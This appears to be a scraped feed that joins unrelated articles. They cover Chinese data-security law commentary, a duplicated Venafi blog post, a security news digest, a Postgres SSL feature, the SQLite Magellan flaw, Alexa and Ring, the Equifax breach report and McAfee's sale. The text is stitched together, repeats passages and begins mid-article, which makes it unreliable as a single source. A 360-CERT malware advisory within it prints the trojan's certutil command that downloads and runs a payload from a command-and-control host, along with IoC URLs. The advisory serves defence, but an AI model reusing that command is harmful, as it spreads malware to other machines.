一是“大数据安全法”的定位,即将数据全体,尤其是“大数据”作为调整对象,以数据生命周期为线索,就数据存储、访问、验证、保护和使用建立一系列程序、标准、角色,明确政府、企业、个人相应的职责、义务、权利,实现对数据安全的全方位规定。

二是“小数据安全法”的定位,即仅将“与国家安全、经济发展,以及社会公共利益密切相关的关键(重要)数据”作为调整对象,聚焦于“关键(重要)数据”的风险预防和管理。显然,这一思路与国家顶层设计更为契合。如果立足于《数据安全法》的上位法《国家安全法》,那么毫无疑问,如何管控危害国家安全和社会公众安全的数据风险,才是《 数据安全法 》的职责所在。同时,将调整范围限制在“关键(重要)数据”上,不但可以降低立法工作难度,有利于与《网络安全法》和未来的《个人信息保护法》等法律衔接,而且有丰富的域外经验可资借鉴,有利于国际交流和相互理解。

在“小数据安全法”的架构下,如何界定“关键(重要)数据”是立法的难点问题。现有《个人信息和重要数据出境安全评估办法》(征求意见稿)《信息安全技术 数据出境安全评估指南》(草案)对“关键(重要)数据”重在性质上认定,将可能危害国家安全、国防利益、国际关系、国家经济秩序和金融安全、国家财产、个人合法权益、国家政治、国土、军事、经济、文化、社会、科技、信息、生态、资源、核设施安全的数据均囊括其中。这固然纤悉无遗,但却有失操作性和明确性,给政府执法和企业守法造成困难。对此,美国“受控非秘信息”(Controlled Unclassified Information)制度提供了他山之石。其通过严密的登记制度,详细列出了农业、受控技术信息、关键基础设施、应急管理、出口控制、金融、地理产品信息、信息系统漏洞信息、情报、国际协议、执法、核、隐私、采购与收购、专有商业信息、安全法案信息、统计、税收等17项门类。中国《数据安全法》可汲取其经验,结合中国行业及其主管部门的意见,进一步厘清具体外延,同时保留一定的灵活性,以适应时代和科技的发展。

“安全第一”还是“发展第一”?

正如中国《网络安全法》第1条和第3条分别体现出 安全和发展两大价值取向 , 《数据安全法》同样需要平衡数据安全和数据流通利用两大价值。 这是因为, 作为数字经济的核心生产要素,数据正成为科技创新的突破点,经济转型和创新发展的新引擎,以及社会治理的有效工具。 对企业来说,数据是21世纪的石油;对于个人而言,数据是其生活的再现;对政府来说,数据是基础性的战略资源。 因此,《数据安全法》必须认真对待数据流通利用问题。

网络信息技术是自创生的系统,这意味着从根本上,数据安全问题要通过数据技术的发展来化解。由此可以理解,英国2011年《网络安全战略》特别提出:化威胁为机遇,通过培育网络安全商业机会,推动技术进步,促进英国在网络空间树立网络安全竞争优势。中国《国家网络空间安全战略》与之殊路同归。基于机遇大于挑战的形势把握,该战略把发展放到了和安全同等的位置上,并将 “贯彻创新、协调、绿色、开放、共享的发展理念”作为首要战略目标。

事实上,网络安全和发展并重的观念已成为国家共识。2014年2月27日, 习近平在中央网络安全和信息化领导小组第一次会议上指出:网络安全和信息化是一体之两翼、驱动之双轮,要处理好安全和发展的关系,做到协调一致、齐头并进,以安全保发展、以发展促安全,努力建久安之势、成长治之业。 2016年4月25日,习近平在全国网络安全和信息化工作会议上进一步指出: 网络安全是动态的而不是静态的,开放的而不是封闭的,相对的而不是绝对的,因此一定避免不计成本追求绝对安全,那样不仅会背上沉重负担,甚至可能顾此失彼。 为此,《数据安全法》应秉持平衡的理念,以“安全是发展的保障,发展是安全的目的”为立法宗旨,通过政府、企业、公众、社会组织共同参与,共筑数据安全防线。

数据主权是“守势”还是“攻势”?

数据主权之于《数据安全法》,就如网络主权之于《网络安全法》,它不但是我们坚守的国家立场,也是处理数据安全的根本指针。尽管早在2015年8月,国务院《促进大数据发展行动纲要》已经提出“增强网络空间数据主权保护能力”,但数据主权的制度设计却始终没有成型。而要落实数据主权,首当其冲的问题是:《数据安全法》究竟优先选择“守势”还是“攻势”?

所谓“守势”,即强调对数据出境的管控。国际上一般通过数据出口限制和数据本地化两种方式加以限制。前者如美国《出口管理条例》(The Export Administrative Regulations)和《国际军火交易条例》(International Traffic in Arms Regulations)对部分重要数据的出口进行许可管制,后者如俄罗斯《关于信息、信息技术和信息保护法》和《个人数据法》严格要求互联网信息服务组织传播者、信息拥有者以及运营商将数据留存于俄罗斯境内。

所谓“攻势”,即强调数据的跨境调取。从当前的国际趋势上看,网络强国均积极谋求跨境的数据管辖权。例如,美国《澄清境外数据合法使用法案》一改之前的“数据存储地标准”,转而采用“数据控制者标准”,规定无论通信、记录或其他信息是否存储在美国境内,其控制者均有义务遵循美国的强制性命令向其提供。无独有偶,欧盟《一般数据保护条例》的长臂管辖权亦将管辖权延伸到欧盟边境之外。

中国更看重“守”还是“攻”?一方面,我们当然要重视“守”。《网络安全法》第三十七条确立了“关键信息基础设施运营者”的数据出境安全评估制度,但范围显然过窄,为此,中央网信办起草的《个人信息和重要数据出境安全评估办法》,将出境安全评估的适用范围拓展到“重要数据”。鉴于《个人信息和重要数据出境安全评估办法》只是部门规章,缺乏明确的上位法依据,亟待通过《数据安全法》补足其合法性。同时,面对美国和欧盟的数据跨境调取,2018年10月,中国《国际刑事司法协助法》出台,规定“非经中华人民共和国主管机关同意,中华人民共和国境内的机构、组织和个人不得向外国提供证据材料和本法规定的协助。”不过,该规定仅限于刑事领域,《数据安全法》有必要作出更细致、更全面的规定。另一方面,我们还要重视“攻”。随着中国企业全球化布局和一路一带的深入,我们的数据安全也面临着“攻守易型”,《数据安全法》应因势而变,亟待从传统上的“属地管辖”转向“保护管辖”,即以保护中国境内的自然人、企业和国家利益为宗旨,不论数据处理行为在中国之内还是之外,只要侵犯到上述利益,《数据安全法》均予以适用。

毫无疑问,攻守交替间,容易产生“以子之矛,攻之之盾”的矛盾。而这恰恰需要立法者的智慧,以期在具体场景下折中调和,有取有舍。

数据安全的国际博弈才刚刚开始。面对英国电信集团(BT Group)将华为设备从现有3G、4G网络核心网中移出的举动,华为公司12月6日回应说:网络安全问题不应该被“泛政治化”。可实际上,包括数据安全在内的网络安全问题绝不可能是政治无涉的。故此,与其说要摆脱政治,毋宁说要在相互冲突的诉求中寻找妥协与共识,通过法律规则和有效对话,最终建立公正、合理的全球网络空间新秩序。(本文作者许可,系对外经济贸易大学数字经济与法律创新研究中心执行主任)


Want a More Secure, More Effective Cloud? Watch Your Machine Identities.

$
0
0

Want a More Secure, More Effective Cloud? Watch Your Machine Identities.

kdobieski

Fri, 12/14/2018 15:45

Long before the invention and adoption of the cloud, the importance of protecting user identities, the identities of people, was obvious. File systems and operating systems going as far back as the 1970s, if not earlier, have had user access built-in. People are assigned usernames and passwords, and files and folders are configured to be accessible only to certain users or user groups.

There are many different methods of authentication, but passwords are one of the oldest and most frequently implemented. If I want to install a new package on my linux desktop, I’d better know my root password! An attempt by a cyber attacker to privilege escalate within my operating system may entail trying to crack my root password. This is why organizations spend lots of money and resources to make sure that only authorized users have access to their authentication credentials. These user identities can apply to individual devices, local networks, wide area networks, online services, and cloud networks of all kinds.

Users have identities, but so do machines, including those in the cloud. A classic type of machine identity is a TLS certificate for an HTTPS website, or any other sort of TLS/SSL encrypted internet service. Code-signing certificates are machine identities that help to verify that software is authentic and legitimate. Also, machine identities, such as SSH keys can help assure that only authorized clients can securely gain remote access to sensitive computer systems via the SSH protocol.But what I’d most like to talk about today is howTLS certificates can be used asmachine identities for microservices and containers within cloud networks.

Related Articles

IoT and Machine Identity Protection: Getting Smarter about Securing Smart Technologies Why the Rise of Enterprise IoT Puts Machine Identities to the Test Securing the Supply Chain: Machine Identity Protection in IoT Applications
Want a More Secure, More Effective Cloud? Watch Your Machine Identities.

Guest Blogger: Kim Crawley

Long before the invention and adoption of the cloud, the importance of protecting user identities, the identities of people, was obvious. File systems and operating systems going as far back as the 1970s, if not earlier, have had user access built-in. People are assigned usernames and passwords, and files and folders are configured to be accessible only to certain users or user groups.

There are many different methods of authentication, but passwords are one of the oldest and most frequently implemented. If I want to install a new package on my Linux desktop, I’d better know my root password! An attempt by a cyber attacker to privilege escalate within my operating system may entail trying to crack my root password. This is why organizations spend lots of money and resources to make sure that only authorized users have access to their authentication credentials. These user identities can apply to individual devices, local networks, wide area networks, online services, and cloud networks of all kinds.

Users have identities, but so do machines, including those in the cloud. A classic type of machine identity is a TLS certificate for an HTTPS website, or any other sort of TLS/SSL encrypted internet service. Code-signing certificates are machine identities that help to verify that software is authentic and legitimate. Also, machine identities, such as SSH keys can help assure that only authorized clients can securely gain remote access to sensitive computer systems via the SSH protocol.But what I’d most like to talk about today is howTLS certificates can be used asmachine identities for microservices and containers within cloud networks.


Want a More Secure, More Effective Cloud? Watch Your Machine Identities.
Learn new ways of protecting machine identities.

Attend a livestreaming event on December 13


Want a More Secure, More Effective Cloud? Watch Your Machine Identities.
Learn more about machine identity protection.

Explore now.

Recent Articles By Author

Machine Identity Protection Development Fund: Our First Three Developers 3 Predictions: What Will Happen to Machine Identities in 2019 We’re on the Cusp of the 4th Industrial Revolution, or Industry 4.0 More from kdobieski

*** This is a Security Bloggers Network syndicated blog from Rss blog authored bykdobieski. Read the original post at: https://www.venafi.com/blog/want-more-secure-more-effective-cloud-watch-your-machine-identities

【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...

$
0
0

摘要: GitLab 推出公开漏洞奖励计划,最高赏金1.2万美元本周,开源的 Git 仓库管理系统 GitLab 宣布推出公开的漏洞奖励计划。研究人员如在产品和服务中发现严重漏洞,最高可获得1.2万美元的奖励。GitLab 旨在通过提供可用于整个 DevOps 生命...

GitLab 推出公开漏洞奖励计划,最高赏金 1.2 万美元
【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...
本周,开源的 Git 仓库管理系统 GitLab 宣布推出公开的漏洞奖励计划。研究人员如在产品和服务中发现严重漏洞,最高可获得1.2万美元的奖励。GitLab 旨在通过提供可用于整个 DevOps 生命周期的开源平台让软件开发更容易更高效。虽然在很多方面它类似于 GitHub,但GitLab 最近融资1亿美元,提供范围更广的服务。2014年,GitLab 在 HackerOne 的协助下推出漏洞披露计划。去年,该公司表示小型私密漏洞奖励计划共为100多名白帽黑客找到的250个左右的漏洞支付约20万美元。GitLab 目前决定通过 HackerOne 推出公开漏洞奖励计划,涵盖 GitLab 安装、生产服务及其它产品如 SaaS 服务。研究人员已受邀报告 SQL 注入、远程代码执行、XSS、CSRF、目录遍历、权限提升和信息泄漏漏洞。

参考来源:

http://codesafe.cn/index.php?r=news/detail&id=4615

严重漏洞让 4 亿微软账户险遭暴露
【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...

在 SafetyDetective 公司工作的印度赏金猎人 Sahad Nk 发现并向微软报告了微软账户中的一系列严重漏洞并获得一笔数额不明的奖金。这些漏洞出现在用户的 MS Office 文件、Outlook 邮件等的微软账户中。也就是说所有类型的账户(超4亿)和所有类型的数据均易遭攻击。如果结合使用这些漏洞,将成为获取用户微软账户访问权限的完美攻击向量。攻击者需要的不过是强制用户点击某链接。Sahad Nk 在博客中表示,微软的一个子域名 “success.office.com” 配置不正确,这也是为何他能使用 CNAME 记录控制该子域名的原因。CNAME 记录是域名之间连接的规范记录。Sahad 使用 CNAME 记录能够定位配置错误的子域名并将其指向个人 Aure 实例,从而获取对子域名和它所获取的所有数据的控制。

参考来源:

https://tech.sina.com.cn

无业黑客最高能年赚 50 万美元 靠测试漏洞赚赏金
【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...
据美国媒体报道,安全漏洞悬赏平台Bugcrowd发布的最新数据显示,通过为特斯拉等公司和美国国防部等组织查找安全漏洞并报告所查找出的问题,自由职业型的精英黑客每年能够获得超过50万美元的收入。于2012年在旧金山成立的Bugcrowd,是为客户查找和报告软件安全漏洞的少数几家所谓的“漏洞悬赏”公司之一。这些公司为黑客提供了一个平台,让黑客安全地对那些希望接受测试的公司的软件进行安全漏洞追踪。黑客按照合同为特定的公司工作,当他们在该特定公司的基础设施中发现缺陷时,就会获得支付的赏金。他们获得支付赏金的多少,取决于所发现漏洞的严重程度。Bugcrowd首席执行官凯西埃利斯(Casey Ellis)表示,随着该领域数百万个职位空缺,各公司正在越来越多地寻找网络安全测试的替代方案。据估计,到2021年,可能会有多达350万个网络工作岗位空缺。

参考来源:

http://tech.qq.com/a/20181212/013702.htm

FB 承认有软件漏洞 680 万用户的照片有风险被存取
【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...
社交网站Facebook承认有软件漏洞,导致最多680万名用户的照片有风险被人在未经同意下存取。受影响的用户将收到通知,提醒他们自己的照片可能已曝光。 Facebook还表示,它将与 开发 人员合作删除它们不应该访问的照片副本。总共有来自876个不同开发者的多达1500个应用程序可能不恰当地访问了用户的图片。Facebook表示,该漏洞与Facebook登录及其照片API相关的错误有关,该错误允许开发人员在自己的应用程序中访问Facebook照片。所有受影响的用户都使用他们的Facebook帐户登录到第三方应用程序,并授予这些应用程序一定程度的访问权限以查看他们的照片。

参考来源:

https://www.cnbeta.com/articles/tech/798641.htm

培训机构贩卖学生信息 安徽警方摧毁一条灰色产业链
【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...
安徽省滁州市琅琊警方成功破获一起涉及侵犯全省多地学生个人信息案件,累计查获学生个人信息20余万条,扣押作案电脑10余台。目前,涉案的4名嫌疑人已被警方刑事拘留。今年11月初,滁州琅琊警方在开展“净网2018”专项行动中获悉,滁州市五中旁的一家培训机构,掌握有该市多家中小学校学生及学生父母的个人信息。信息内容涵盖学生的姓名、班级,以及学生父母的姓名、联系方式、工作单位等详细信息。11月22日,专案组组织警力对该教育培训机构进行突击检查,当场查获学生及家长的个人信息一万余条,扣押涉案电脑三台。随着犯罪嫌疑人的悉数落网,整个犯罪链条也浮出水面。为了招揽生源,扩大知名度,束某东从朋友张某那获得了一份涉及安徽省中小学学籍信息,然后将这些信息打包出售,通过上家卖下家,下家再卖下家,循环在市场上扩散开来。截止目前,琅琊公安分局已经对涉嫌侵犯公民个人信息罪的犯罪嫌疑人闫某、付某、梁某某、束某东依法采取了强制措施。

参考来源:

http://www.xinhuanet.com/local/2018-12/12/c_1123843102.htm

共和党议员建议发行 “ 墙币 ” 资助美墨边界围墙建造
【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...
美国总统特朗普想要在美墨边境造墙,但该项目提议尚未获得国会拨款。俄亥俄州众议员 Warren Davidson 提出了新方法去资助该项目:通过众筹网站众筹或者利用区块链技术发行数字货币,他称之为“墙币(Wall Coins)”。他上月底向国会递交了法案“Buy a Brick, Build a Wall Act”,允许财政部长接受造墙的小额捐款,设立账号 Border Wall Trust Fund 去管理资金。

参考来源:

https://www.solidot.org/story?sid=58960

意大利石油和天然气服务公司 Saipem 称遭到了来自印度的网络攻击
【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...
据路透社(Reuters)报道,意大利石油和天然气服务公司Saipem(SPMI.MI)表示,它于周本一发现了一起网络攻击,主要影响了其在中东的服务器。Saipem公司的数字和创新负责人Mauro Piasere告诉路透社,攻击主要影响了该公司在中东地区的服务器,包括沙特阿拉伯、阿拉伯联合酋长国和科威特。他补充说,该公司在意大利、法国和英国的主要运营中心的服务器没有受到影响。Mauro Piasere表示,该公司正在努力使用备份来恢复受影响的系统。这种情况表明,该公司的服务器很可能是遭到了勒索软件的袭击。“为了评估攻击规模,相关服务器已经暂时关闭。一旦威胁被消除,数据备份系统将启动。”Mauro Piasere说,“没有数据丢失,因为我们所有的系统都有备份。”Mauro Piasere还透露,此次攻击来自印度金奈,但攻击者的身份尚不明确。

参考来源:

https://www.hackeye.net/securityevent/17864.aspx

关于安全帮

安全帮,是中国电信北京研究院旗下安全团队,致力于成为“SaaS安全服务领导者”。目前拥有“1+4”产品体系:一个SaaS电商(www.anquanbang.vip) 、四个平台(SDS软件定义安全平台、安全能力开放平台、安全大数据平台、安全态势感知平台)。

相关文章 【安全帮】新型Android木马可从PayPal账户窃取资金 【安全帮】联想一台笔记本失窃 内含成千上万名员工未加密数据 【安全帮】摩拜面临德国监管机构调查 或因违反欧盟数据保护法 【安全帮】窃取用户信息、“榨干”手机电量,Google Play紧急下架22款恶意软件 【安全帮】“嫩模女友”等15个扣费类恶意程序变种曝光,名称带诱惑性


【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚 ...

Postgres 12 highlight - Controlling SSL protocol

$
0
0

The following commit has happened in Postgres 12, adding a feature which allows to control and potentially enforce the protocol SSL connections can use when connecting to the server:

commit: e73e67c719593c1c16139cc6c516d8379f22f182 author: Peter Eisentraut <peter_e@gmx.net> date: Tue, 20 Nov 2018 21:49:01 +0100 Add settings to control SSL/TLS protocol version For example: ssl_min_protocol_version = 'TLSv1.1' ssl_max_protocol_version = 'TLSv1.2' Reviewed-by: Steve Singer <steve@ssinger.info> Discussion: https://www.postgresql.org/message-id/flat/1822da87-b862-041a-9fc2-d0310c3da173@2ndquadrant.com

As mentioned in the commit message, this commit introduces two new GUC parameters:

ssl_min_protocol_version, to control the minimal version used as communication protocol. ssl_max_protocol_version, to control the maximum version used as communication protocol.

Those can also take different values, which defer depending on what the version of OpenSSL PostgreSQL is compiled with is able to support or not, with values going from TLS 1.0 to 1.3: TLSv1, TLSv1.1, TLSv1.2, TLSv1.3. An empty string can also be used for the maximum, to mean that anything is supported, which gives more flexibility for upgrades. Note that within a given rank, the latest protocol will be the one used by default.

Personally, I find the possibility to enforce that quite useful, as up to Postgres 11 the backend has been taking automatically the newest protocol available with SSLv2 and SSLv3 disabled by being hardcoded in the code. However sometimes there are requirements which pop up, telling to make sure that at least a given TLS protocol needs to be enforced. Such things would not matter for most users but for some large organizations sometimes it makes sense to enforce some control. This is also useful for testing a protocol when doing development on a specific patch, which can happen when working on things like SSL-specific things for authentication. Another area where this can be useful is if a flaw is found in a specific protocol to make sure that connections are able to fallback to a safer default, so flexibility is nice to have from all those angles.

From an implementation point of view, this makes use of a set of specific OpenSSL APIs to control the minimum and maximum protocols:

SSL_CTX_set_min_proto_version SSL_CTX_set_max_proto_version

These have been added in OpenSSL 1.1.0, still PostgreSQL provides a set of compatibility wrappers which make use of SSL_CTX_set_options for older versions of OpenSSL, so this is not actually a problem when compiling with other versions, especially since OpenSSL 1.0.2 is the current LTS (Long-Time-Supported) version of upstream at this point.

利用“驱动人生”升级程序的恶意程序预警

$
0
0

利用“驱动人生”升级程序的恶意程序预警

报告编号:B6-2018-121501

报告来源:360-CERT

报告作者:360核心安全团队、360-CERT

更新日期:2018-12-15

0x00 概述

2018年12月14日下午,360互联网安全中心监控到一批通过 “人生日历”升级程序下发的下载器木马,其具备远程执行代码功能,启动后会将用户计算机的详细信息发往木马服务器,并接收远程指令执行下一步操作。

同时该木马还携带有永恒之蓝漏洞攻击组件,可通过永恒之蓝漏洞攻击局域网与互联网中其它机器。

360安全卫士已在第一时间对该木马进行了拦截查杀,并提交厂商处理。

360CERT在此发出预警,请用户及时做好安全防护与病毒查杀工作。

0x01 技术细节分析

2018年12月14日14时,驱动人生旗下的“人生日历”产品,通过其升级组件DTLUpg.exe,开始下发执行木马程序f79cb9d2893b254cc75dfb7f3e454a69.exe,18时开始木马推送量开始扩大,到23时我们向厂商通报了发现的情况,下发停止。

截止12月14日21时,该木马累计攻击计算机超过5.7万台(不包括漏洞攻击情况,360安全卫士带有永恒之蓝漏洞免疫功能)。

该木马程序执行后,会向系统安装木马服务Ddriver实现长期驻留,之后向服务器haqo.net发送宿主机器的详细信息,包括如下信息:

计算机名称 操作系统版本 机器软硬件信息等

之后接收服务器返回的shellcode指令执行。


利用“驱动人生”升级程序的恶意程序预警
利用“驱动人生”升级程序的恶意程序预警

同时该木马具有自升级,远程下载文件执行,远程创建服务等功能。

木马在启动后,会根据服务器指令,下载一款永恒之蓝漏洞利用工具,通过该漏洞利用工具,攻击局域网与互联网中其它计算机,攻击成功后,使用certutil做跳板程序,向其它机器安装该木马(也可以安装其它木马,由云端服务器决定)。

certutil -urlcache -split -f hxxp://dl.haqo.net/dl.exe c:\install.exe&c:\install.exe&……
利用“驱动人生”升级程序的恶意程序预警

目前该木马的C&C仍然活跃,收到的更多指令在继续分析中。

上述由360核心安全团队提供分析。

0x02 修复方式与安全建议 及时使用360安全卫士进行病毒查杀(360安全卫士具备的永恒之蓝漏洞免疫功能,可保护用户免遭该木马攻击)
利用“驱动人生”升级程序的恶意程序预警
做好相关重要数据备份工作 加强系统安全工作,及时升级软件与安装操作系统补丁 服务器暂时关闭不必要的端口(如135、139、445) 服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解 0x03 相关IoC

hxxp://p.abbny.com/im.png

hxxp://i.haqo.net/i.png

hxxp://dl.haqo.net/eb.exez

hxxp://dl.haqo.net/dl.exe

ackng.com

74e2a43b2b7c6e258b3a3fc2516c1235

2e9710a4b9cba3cd11e977af87570e3b

f79cb9d2893b254cc75dfb7f3e454a69

93a0b974bac0882780f4f1de41a65cfd

0x04 时间线

2018-12-14360互联网安全中心监测发现木马

2018-12-15360CERT && 360核心安全团队发布预警

声明:本文来自360CERT,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

Critical SQLite Flaw Leaves Millions of Apps Vulnerable to Hackers

$
0
0

Critical SQLite Flaw Leaves Millions of Apps Vulnerable to Hackers

Cybersecurity researchers have discovered a critical vulnerability in widely used SQLite database software that exposes billions of deployments to hackers.

Dubbed as ' Magellan ' by Tencent's Blade security team, the newly discovered SQLite flaw could allow remote attackers to execute arbitrary or malicious code on affected devices, leak program memory or crash applications.

SQLite is a lightweight, widely used disk-based relational database management system that requires minimal support from operating systems or external libraries, and hence compatible with almost every device, platform, and programming language.

SQLite is the most widely deployed database engine in the world today, which is being used by millions of applications with literally billions of deployments, including IoT devices, macOS and windows apps, including major web browsers, such as Adobe software, Skype and more.

Since Chromium-based web browsers―including Google Chrome, Opera, Vivaldi, and Brave―also support SQLite through the deprecated Web SQL database API, a remote attacker can easily target users of affected browsers just by convincing them into visiting a specially crafted web-page.

"After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability," the researchers said in a blog post .

SQLite has released updated version 3.26.0 of its software to address the issue after receiving responsible disclosure from the researchers.

Google has also released Chromium version 71.0.3578.80 to patch the issue and pushed the patched version to the latest version of Google Chrome and Brave web-browsers.

Tencent researchers said they successfully build a proof-of-concept exploit using the Magellan vulnerability and successfully tested their exploit against Google Home.

Since most applications can't be patched anytime sooner, researchers have decided not to disclose technical details and proof-of-concept exploit code to the public.

"We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible," the researchers said.

Since SQLite is used by everybody including Adobe, Apple, Dropbox, Firefox, Android, Chrome, Microsoft and a bunch of other software, the Magellan vulnerability is a noteworthy issue, even if it's not yet been exploited in the wild.

Users and administrators are highly recommended to update their systems and affected software versions to the latest release as soon as they become available.

Stay tuned for more information.

Alexa can now arm your home security system ― including Amazon’s Ring Alarm

$
0
0

You would think that Amazon’s Ring home security system and Amazon’s Echo smart speakers would intelligently work together, right? You’d be mostly wrong ― but today, the company is taking another small step towards tying them together by letting you arm, disarm, and check the status of some Ring, ADT, Honeywell, Abode, and Scout security systems just by asking Alexa to do so.

And since I recently bought a Ring Alarm for my own house ― Dan convinced me with his review ― I decided to give the new functionality a spin this afternoon.

It’s a pretty simple integration, honestly. You install the Ring skill from the Skill Store in your Alexa app, make sure Alexa can see your alarm system, and then you can use the following commands (in the United States):

Alexa, arm Ring Alexa, set Ring to Home / Away Alexa, is Ring armed? Alexa, disarm Ring

It’s a little bit easier than flipping open the Ring app, waiting for it to connect to the Alarm base station and tapping a button, but only by a little, and there doesn’t seem to be a way to even tell which of your door or window sensors has been tripped.

Mind you, the disarm command only works if you explicitly enable it in the skill’s settings page and also say your pin ― which makes sense, because you wouldn’t want a burglar just shouting “ALEXA, DISARM RING” from outside your home before they break in.

Amazon announced today that it’s opening up its Security Panel Controller API to other device manufacturers as well, so you can probably expect that list of supported alarms to expand.

Amazon’s also rolling out an invite-only preview of its Alexa Guard feature today, which gives Alexa the ability to listen for a glass window breaking , or a smoke alarm blaring, and alert you right away. That’d come in handy for Ring owners too, because Ring doesn’t offer window break sensors yet.

If you want to sign up for notifications about when you can try Alexa Guard, too, you’ll find that in the Alexa App > Settings > Guard > Notify Me When Available.

I’d be negligent if I didn’t point out there are a couple other, limited ways that Ring can work with Amazon’s voice assistant today. You can ask Alexa to show your Ring Doorbell’s video feed on an Echo Show or Fire TV (which isn’t a Ring exclusive feature ) and you can use an Echo as an extra doorbell chime as well.

The Equifax breach report

$
0
0

The House Oversight and Government Reform Committee released a report on the big Equifax data breach that happened last year. In a nutshell, a legacy application called ACIS contained a known vulnerability that attackers used to gain access to internal Equifax databases.

The report itself is… frustrating. There is some good content here. The report lays out multiple factors that enabled the breach, including:

A scanner that was run but missed the vulnerable app because of the directory that the scan ran in An expired SSL certificate that prevented Equifax from detecting malicious activity The legacy nature of the vulnerable application (originally implemented in the 1970s) A complex IT environment that was the product of multiple acquisitions. An organizational structure where the chief security officer and the chief information officer were in separate reporting structures.

The last bullet, about the unconventional reporting structure for the chief security officer, along with the history of that structure, was particularly insightful. It would have been easy to leave out this sort of detail in a report like this.

On the other hand, the report exhibits some weapons-grade hindsight bias. To wit:

Equifax, however, failed to implement an adequate security program to protect this sensitive data. As a result, Equifax allowed one of the largest data breaches in U.S. history. Such a breach was entirely preventable .

Equifax failed to fully appreciate and mitigate its cybersecurity risks. Had the company taken action to address its observable security issues prior to this cyberattack, the data breach could have been prevented.

Page 4

Equifax knew its patch management process was ineffective.501 The 2015 Patch Management Audit concluded “vulnerabilities were not remediated in a timely manner,” and “systems were not patched in a timely manner.” In short, Equifax recognized the patching process was not being properly implemented, but failed to take timely corrective action.

Page 80

The report highlights a number of issues that, if they had been addressed, would have prevented or mitigated the breach, including:

Lack of a clear owner of the vulnerable application.An email went out announcing the vulnerability, but nobody took action to patch the vulnerable app.

Lack of a comprehensive asset inventory.The company did not have a database where that they could query to check if any published vulnerabilities applied to any applications in use.

Lack of network segmentation in the environment where the vulnerable app ran.The vulnerable app ran a network that was not segmenting from unrelated databases. Once the app was compromised, it was used as a vector to reach these other databases.

Lack of integrity file monitoring (FIM).FIM could have detected malicious activity, but it wasn’t in place.

Not prioritizing retiring the legacy system.This one is my favorite. From the report: “Equifax knew about the security risks inherent in its legacy IT systems, but failed to prioritize security and modernization for the ACIS environment” .

Use of NFS.The vulnerable system had an NFS mount, that allowed the attackers to access a number of files.

Frustratingly, the report does not go into any detail about how the system got into this state. It simply lays them out like an indictment for criminal negligence. Look at all of these deficiencies! They should have known better! Even worse, they did know better and didn’t act!

There was also a theme that anyone who was worked in a software project would recognize:

[Former Chief Security Officer Susan]Mauldin stated Equifax was in the process of making the ACIS application Payment Card Industry (PCI) Data Security Standard (DSS) compliant when the data breach occurred.

Mauldin testified the PCI DSS implementation “plan fell behind and these items did not get addressed.” She stated:

A. The PCI preparation started about a year before, but it’s very complex. It was a very complex very complex environment.

Q. year before, you mean August 2016?

A. Yes, in that timeframe.

Q. And it was scheduled to be complete by August 2017?

A. Right.

Q. But it fell behind?

A. It fell behind.

Q. Do you know why?

A. Well, what I recall from the application team is that it was very complicated, and they were having it just took a lot longer to make the changes than they thought. And so they just were not able to get everything ready in time.

Pages 80-81

And, along the same lines:

So there were definitely risks associated with the ACIS environment that we were trying to remediate and that’s why we were doing the CCMS upgrade.

It was just it was time consuming, it was risky . . . and also we were lucky that we still had the original developers of the system on staff.

So all of those were risks that I was concerned about when I came into this role. And security was probably also a risk, but it wasn’t the primary driver. The primary driver was to get off the old system because it was just hard to manage and maintain.

Graeme Payne, former Senior Vice President and Chief Information Officer for Global Corporate Platforms, page 82

Good luck finding a successful company that doesn’t face similar issues.

Finally, in a beautiful example of scapegoating, there’s the Senior VP that Equifax fired, ostensibly for failing to forward an email that had already been sent to an internal mailing list. In the scapegoat’s own words:

To assert that a senior vice president in the organization should be forwarding vulnerability alert information to people . . . sort of three or four layers down in the organization on every alert just doesn’t hold water, doesn’t make any sense. If that’s the process that the company has to rely on, then that’s a problem.

Graeme Payne, former Senior Vice President and Chief Information Officer for Global Corporate Platforms, page 51

老牌安全软件公司迈克菲可能又要被卖掉 英特尔曾在其身上损失30多亿美元

$
0
0

老牌安全软件公司迈克菲可能又要被卖掉 英特尔曾在其身上损失30多亿美元

据知情人士透露,私人股本公司 Thoma Bravo 正就从 TPG 和英特尔 (Intel) 手中收购安全软件公司迈克菲 (McAfee) 展开初步谈判,收购价与当时英特尔在 2016 年用 42 亿美元的价格高出很多。

上述知情人士说,谈判仍有可能破裂,预计不会很快宣布达成协议。这些人士强烈要求匿名,因为谈判是私下进行的。

迈克菲公司由约翰迈克菲于1987年创立,历史上曾为个人电脑和服务器开发网络安全软件,保护用户免受恶意软件和其他病毒的攻击。这种类型的计算机安全可以防止对个人设备的攻击。最近,它已经扩展到移动设备和云计算领域,这也是黑客们迁移的地方。

该公司直到 2010 年才上市,当时英特尔以 76 亿美元收购了它,英特尔希望将自己的芯片与迈克菲的安全技术紧密结合在一起。但英特尔的这一愿景未能实现,于是在 2016 年宣布以 42 亿美元的估值将 51% 的业务出售给 TPG 时,损失了逾 30 亿美元。几个月后,TPG 聘请 Thoma Bravo 进行少数股权投资。

TPG 的多数股权在不到两年的时间里通过附加收购帮助迈克菲业务实现了转型。今年 1 月,迈克菲完成了对 Skyhigh Networks 的收购。Skyhigh 帮助企业监控员工使用的云服务。今年 3 月,迈克菲还收购了 Tunnelbear,该公司提供虚拟专用网络,在使用共享 WiFi 账户时保护数据。

